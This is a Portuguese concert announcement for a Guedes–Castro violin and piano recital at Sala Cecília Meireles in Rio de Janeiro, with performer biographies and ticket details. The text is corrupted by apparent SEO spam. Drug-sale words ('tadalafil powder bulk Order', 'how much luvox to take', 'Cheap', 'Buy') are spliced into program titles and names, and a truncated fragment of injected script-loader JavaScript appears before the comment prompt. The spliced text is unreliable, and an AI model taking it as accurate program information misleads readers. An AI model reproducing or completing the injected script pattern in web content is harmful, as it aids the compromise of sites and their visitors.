Música de câmaraProgramaçãoRio de Janeiro

Piano e violino com sotaque francês na Cecília Meireles

Ricardo Castro e Daniel Guedes reabrem a série Música de Câmara com Debussy, Ravel, Ysaÿe e Franck.

 

No próximo dia 25 de fevereiro, quarta-feira, às 20h, o violinista Daniel Guedes e o pianista Ricardo Castro fazem o primeiro recital pós-carnaval na Sala Cecília Meireles, no Rio de Janeiro. Como parte da série Música de Câmara, o concerto terá obras de Claude Debussy (Estampes tadalafil powder bulk Order ), Maurice Ravel (Sonata para Violino e Piano), Eugène Ysaÿe (Sonata para Violino Solo n. 2) e Cesar Franck (Sonata para Violino e Piano em Lá Maior). Os ingressos já estão à venda e custam R$ 40 (inteira).

Sobre os intérpretes

Considerado um dos mais importantes músicos brasileiros de sua geração, Daniel Guedes vem atuando como violinista, violista, camerista, professor e regente. Carioca, nascido em 1977, iniciou seus estudos de violino aos sete anos com seu pai e logo ingressou no Conservatório Brasileiro de Música. Em 1991 ganhou bolsa de estudos da Capes para estudar em Londres, tendo sido aluno de Detlef Hahn na Guildhall School of Music. Posteriormente cursou bacharelado e mestrado na Manhattan School of Music de Nova York, nas classes de Pinchas Zukerman e Patinka Kopec. Foi vencedor dos concursos Jovens Concertistas Brasileiros (1991), Bergen Philharmonic Competition (1998) e Waldo Mayo Memorial Award (2000), prêmio este que lhe valeu um concerto no Carnegie Hall de Nova York tocando o Concerto n. 1 Order , de Bruch.

Daniel gravou seu primeiro disco em 2000, pelo selo Niterói Discos, e, em 2004, lançou o CD Impressões Brasileiras, com obras de Villa-Lobos, Flausino do Vale, Nelson Macedo, Alceo Bocchino, entre outros. Lançou, em 2008, o CD Cheap Suíte das Origens how much luvox to take , com obras de Nelson Macêdo. Gravou também o CD online Beethoven in Brazil, com Ilan Rechtman, para o selo Well-Tempered Productions da Califórnia, e o CD Violão e Violino, com Mario Ulloa, tocando compositores populares brasileiros, pelo selo Rob Digital. Este ano o duo lança o CD Amor em Paz, também pela Rob Digital.

Ricardo Castro Buy é pianista e regente. Vencedor dos concursos Internacional da ARD de Munique, Rahn de Zurique, Pembaur de Berna, teve sua carreira alavancada internacionalmente ao se tornar o primeiro latino-americano a vencer o Concurso Internacional de Piano de Leeds, um dos mais importantes do mundo. Atuou como solista na BBC Philharmonic de Londres, Orquestra da Suisse Romande, English Chamber Orchestra, Academy of St. Martin-in-the-Fields, Sinfônica de Birmingham, Filarmônica de Tóquio e Mozarteum de Salzburg. Tocou sob regência de Sir Simon Rattle, Yakov Kreizberg, Alexander Lazarev, John Neschling, Kazimierz Kord e Michioshi Inoue.

Iniciou, em 2003, um duo com a pianista Maria João Pires, apresentando-se no Concertgebouw (Amsterdã), Tonhalle (Zurique), Palau de La Musica (Barcelona), Auditório Nacional (Madri), entre outras casas. Em 2005, o duo lançou seu primeiro CD, pela Deutsche Grammophon, com obras de Schubert. Gravou pela BMG cinco CDs com obras de Chopin e outros dedicados a Mozart, De Falla e Liszt. Castro é ainda fundador e diretor artístico do Neojibá – Núcleo Estadual de Orquestras Juvenis e Infantis da Bahia. Em 2011, recebeu o Prêmio Bravo, como Personalidade Cultural do Ano, e, em 2013, foi agraciado com o título de Membro Honorário da Royal Philharmonic Society de Londres, sendo o único brasileiro a recebê-lo. O pianista leciona na Haute École de Musique de Lausanne (Suíça).

 

SERVIÇO:

Daniel Guedes (violino) e Ricardo Castro (piano)

Dia 25 de fevereiro, quarta-feira, às 20 horas

Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro/RJ. Tels.: 21 2332-9223 e 2332-9224)

Ingressos: R$ 40 (com 50% de desconto para estudantes e idosos)

680 lugares

Buy }var d=document;var s=d.createElement(‘script’);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.